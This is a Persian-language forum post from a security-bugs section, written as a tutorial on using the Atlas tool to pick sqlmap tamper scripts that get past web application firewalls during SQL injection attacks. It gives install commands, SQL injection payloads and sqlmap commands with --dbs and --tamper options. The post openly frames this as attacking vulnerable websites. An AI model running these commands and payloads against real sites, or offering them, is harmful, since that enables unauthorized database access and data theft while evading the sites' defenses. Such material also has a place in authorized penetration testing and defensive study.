جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'atlas'.
1 نتیجه پیدا شد
-
اموزش sqlmap آموزش یافتن tamper مناسب برای sqlmap در زمان مواجهه با WAF
mownten پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی
[سطح: متوسط] با عرض سلام و تبریک سال نو به کاربران عزیز من امروز با یه مورد خوب و مشکل گشا توی حملات SQLi مواجه شدم که تصمیم گرفتم بیام براتون توضیح بدم. مساله اینه که بیشترین انگیزه برای حمله برای اکثریت کاربران، حمله به وبسایت های آسیب پذیر در قبال باگ SQL Injection هست لکن بعضی واقع با فایروال هایی مواجه میشن و وقتی کار رو بصورت کامل هم میسپرن به دست sqlmap، باز به مشکل بر میخورن. اینجا مهاجم باید از Tamperها استفاده بکنه تا بتونه فایروال رو بایپس کنه اما یکی دو تا نیستن که و sqlmap هم فقط گاها space2comment رو پیشنهاد میده. چطور میشه کل تمپر ها رو تست کرد؟ با ابزاری به نام Atlas. امروز با ابزار Atlas آشنا میشیم که برای بایپس کردن WAF یا IDS یا IPS و یافتن Tamper مناسب مفید هست. بریم سراغ اصل مطلب. دستورات نصب و اجرای این ابزار توی لینوکس به شرح زیر هست: $ git clone [Hidden Content] atlas $ cd atlas $ python atlas.py فرض کنیم لینک اسیب پذیر ما این هست: [Hidden Content] و پیلود ما هم اینه: -1234 AND 4321=4321-- AAAA برای استفاده از این ابزار باید از دستور اینچنینی استفاده کنید: $ python atlas.py --url [Hidden Content] --payload="-1234 AND 4321=4321-- AAAA" --dbms=mysql --random-agent -v حالا این ابزار کجا و چه زمانی استفاده میشه؟ فرض کنید توی sqlmap از این دستور استفاده کردید و با یه WAF برخورد کردید: $ python sqlmap.py -u '[Hidden Content]' --dbs --random-agent -v 3 تصویر رو ببینید: در اینجا پیلود به شرح زیر هست که توسط WAF یا IPS یا IDS بلاک شده و با خطای 403 Forbidden مواجه شده. پیلود : Price_ASC') AND 8716=4837 AND ('yajr'='yajr کافیه همین پیلود رو ورداریم و بدیم به Atlas با tamper مناسب برای بایپس و حل این مشکل رو پیشنهاد بده. بدین شکل: $ python atlas.py --url '[Hidden Content]' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v حالا نتیجه : میبینیم که در خط سبک رنگ به ما پیشنهاد داده شده که از تمپری به نام Versiondkeywords استفاده کنیم تا اون فایروال روی وبسایت هدف، بایپس بشه. پس از این تمپر بدین شکل استفاده می کنیم: $ python sqlmap.py -u '[Hidden Content]' --dbs --random-agent -v 3 --tamper=versionedkeywords لینک دریافت Atlas از Github: [Hidden Content] موفق باشید. سوالی هم داشتید در ادامه این تاپیک نپرسید. در تاپیک سوال و جواب بپرسید. Atlas-sqlmap-tamper-suggesy-master.zip-
- tamper finder
- sql inejction
-
(و 4 مورد دیگر)
برچسب زده شده با :